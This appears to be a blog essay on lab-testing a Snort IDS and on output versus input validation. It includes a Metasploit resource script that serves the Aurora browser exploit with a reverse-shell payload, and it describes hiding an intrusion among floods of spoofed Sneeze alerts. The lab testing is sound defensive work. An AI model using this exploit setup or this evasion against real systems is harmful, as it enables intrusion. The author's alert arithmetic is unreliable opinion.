Testing an IDS is a strange matter because what you're testing for are "known knowns" and nothing more. These "known knowns" are nothing more than signatures cobbled together to alert you to "an event." But what happens when someone is firing off "unknowns," attacks that don't have a signature? That's what you'd really want to test: the alerting capability against attacks you're not aware of. This is a complicated task to pull off, and if you could do it, you could likely patent the technique/method and make some money. Anyhow, there are two routes (attack vectors) to think about: an attacker attacking what's BEHIND the IDS, and an attacker attacking the IDS itself.
Attacking the signatures can be done with a variety of tools, so I'll start with the de facto standard, Metasploit. Using Metasploit, you can try the following:
                         ---------        HostA
                        |         |      /
Attacker 10.10.10.1 --> |   IDS   | ----+---- HostB
                        |         |      \
                         ---------        HostC
Place an attacker in what you're mimicking to be "the Internet," or a place outside of the IDS, and pick a host - preferably something disposable, say a VMware image. Using Metasploit on the attacker machine, fire off a barrage of tests aimed at that host. The goal is to see what Snort can and can't see.
In the same fashion, configure Metasploit to act as a server for a client-side attack. E.g., try the Aurora attack and configure Metasploit to "own," say, HostA via the client side, then analyze the results. Did the IDS see it? What *DOES* it see? Can you counter it?
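As a sketch of that client-side test, a Metasploit resource script along these lines would stand up the Aurora browser exploit as a server (the addresses match the diagram above; the port and payload are my own choices, so adjust for your lab):

```
# aurora.rc -- sketch of a client-side test server for the lab above
# (assumes the attacker box is 10.10.10.1, as in the diagram)
use exploit/windows/browser/ms10_002_aurora
set SRVHOST 10.10.10.1
set SRVPORT 8080
set URIPATH /
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.10.1
exploit -j
```

Run it with `msfconsole -r aurora.rc`, browse to the attacker's URL from HostA, and watch what Snort flags on the way through.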
---/ Enter the real world
Because a machine can never think like an attacker, the testing space becomes too broad for you to continuously pound at Snort. You could NEVER control what someone is trying to put IN. You *CAN* control what goes out, though, and this is where too many people get it wrong. Terms of the day: input validation, output validation. These commonly used terms are generally thrown around in the realm of web application security, and here too is where they miserably fail...
Quotes from OWASP:
Input validation refers to the process of validating all the input to an application before using it.
Output validation refers to the process of validating the output of a process before it is sent to some recipient.
Which do you think is more crucial? If you answered input validation, you're wrong. If you think they're equally important, you're wrong. With input validation, you're assuming you can figure out every single potential INPUT someone could fire off at you. So let's do some logical math here, rounded to tens to keep it clean. On the Internet, at any given point in time, how many connections do you think you would see to any of your machines? A couple hundred? A couple thousand? Of all the inputs an attacker could dream up, how many do you think you can enumerate in advance? If you answered anything above zero, you're wrong.
Input validation goes with the theory that "this is a form; someone should enter a number into this form; I will make sure only numbers are entered." You script your code to solely allow 0's. See the failure here? Just because you scripted your code doesn't mean another layer is scripted equally. Someone tampers with, say, the presentation or session layer while you scripted your recipe at the application layer. Now what?
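A minimal sketch of that input-validation mindset, and its blind spot (the function names are mine, not from any framework):

```python
import re

def validate_input(value: str) -> bool:
    """Application-layer input validation: accept only digits."""
    return re.fullmatch(r"[0-9]+", value) is not None

# The check works for the inputs you anticipated...
assert validate_input("12345")
assert not validate_input("1; DROP TABLE users--")

# ...but it only runs where you put it. Any other path into the same
# backend (a second endpoint, a batch import, a tampered session layer)
# that never calls validate_input() sails right past it -- which is the
# "another layer isn't scripted equally" failure described above.
```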
Output validation is the opposite: "this is a webserver that returns a webpage with a date," so you script your code to ONLY print out dates. The control is more granular here. You KNOW what it is that YOU want the recipient to see. You can do MUCH MORE here than you can by assuming you'll stop someone from firing away. The math?
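A minimal sketch of the output-validation side (the names and the date format are my own assumptions; the point is the direction of the check):

```python
import re

# The ONE shape of output this server is scripted to emit.
DATE_RE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")

def validate_output(body: str) -> str:
    """Refuse to send anything that isn't a date, and alert on it.

    An unexpected body is the single high-value event: the server
    tried to emit something it was never scripted to emit.
    """
    if DATE_RE.fullmatch(body) is None:
        raise RuntimeError(f"ALERT: unexpected output blocked: {body!r}")
    return body

validate_output("2024-05-01")      # expected shape, passes through
# validate_output("uid=0(root)")   # would raise -- mission critical
```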
Input Validation:  N * A = F
Output Validation: N * A = 1
N = number of attackers
A = attacks launched per attacker
F = event alerts being fired at you
With input validation, how long before you've created a set of Frankenstein signatures and variances of those? The signature count would be phenomenally high, versus output validation, where the signature set is smaller and more manageable. Not only that, but what is LEAVING holds more weight than what is COMING in. You CAN'T and will NEVER be able to control the garbage on the Internet, but you CAN control what is LEAVING your network. The attack and signature space is smaller.
Input Validation - 100(N) * 100(A) = 10,000(F)
Output Validation - 100(N) * 100(A) = 1(F)
Here we assume you will see, say, 100 random attackers trying 100 random attacks each. Which is more important to you: getting 10,000 alerts you will learn to ignore, or ONE alert that holds weight? "What the hell is he talking about, 1(F)!?" The 1(F) on the output-validation side means you don't care to see what is coming in; you want to make sure that if your server - the one you configured to show only 0 - spits OUT anything other than 0 (in this case, your server sent a 1), that IS mission critical, because it wasn't supposed to do that. Anything else doesn't truly matter.
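The arithmetic above as a quick sanity check:

```python
# Alert volume under each model, using the 100-attacker / 100-attack
# example from the text.
attackers = 100
attacks_each = 100

# Input validation: every inbound attack is a candidate alert.
input_alerts = attackers * attacks_each

# Output validation: an alert fires only when the server's output
# deviates from its one allowed response -- the single "1" above.
output_alerts = 1

print(input_alerts)   # 10000 alerts you will learn to ignore
print(output_alerts)  # the one alert that holds weight
```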
With all this said, I will go back to tools now. Another tool you could use to test is Sneeze. Sneeze uses Snort's own signatures to overwhelm the IDS. Let's think about that concept and why it's a useless test tool for an IDS. Using V for Vendetta as an example, imagine having a network full of people in "V" masks all lurking around. Who would you look at? What would you see?
Because Sneeze is using Snort against itself, there is nothing to stop me from generating and firing off thousands of spoofed alerts at you, getting lost amongst those alerts, and getting in. With Sneeze you could create a script to do just that and ease your way in undetected, but what have you really accomplished? Imagine again, just like V for Vendetta, thousands of people in the same mask (the attacks) walking in a courtyard (your network) with one of them actually prying the door open, hidden amongst the others.

Sneeze: http://www.securiteam.com/tools/5DP0T0AB5G.html
Hope that didn't confuse you.